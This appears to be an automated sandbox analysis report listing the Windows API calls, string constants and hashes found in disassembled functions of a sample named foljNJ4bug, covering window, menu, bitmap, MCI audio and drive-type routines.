                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4116747274-0
                                                                                                                                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                                              APIs
                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                                              • _wcslen.LIBCMT ref: 00461683
                                                                                                                                              • __swprintf.LIBCMT ref: 00461721
                                                                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                              • GetParent.USER32(?), ref: 004618C3
                                                                                                                                              • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                              • String ID: %s%u
                                                                                                                                              • API String ID: 1899580136-679674701
                                                                                                                                              • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                              • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                              • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                              • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                              APIs
                                                                                                                                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoItemMenu$Sleep
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 1196289194-4108050209
                                                                                                                                              • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                                              • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                              • String ID: (
                                                                                                                                              • API String ID: 3300687185-3887548279
                                                                                                                                              • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                              • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                              • API String ID: 1976180769-4113822522
                                                                                                                                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 461458858-0
                                                                                                                                              • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                              • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                                              • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                              • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3969911579-0
                                                                                                                                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 956284711-4108050209
                                                                                                                                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                              • API String ID: 1965227024-3771769585
                                                                                                                                              • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                                                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                                              • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                                                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: SendString$_memmove_wcslen
                                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                              • API String ID: 369157077-1007645807
                                                                                                                                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32 ref: 00445BF8
                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                              • API String ID: 3125838495-3381328864
                                                                                                                                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$CharNext
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1350042424-0
                                                                                                                                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                              • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                              • API String ID: 3052893215-2127371420
                                                                                                                                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
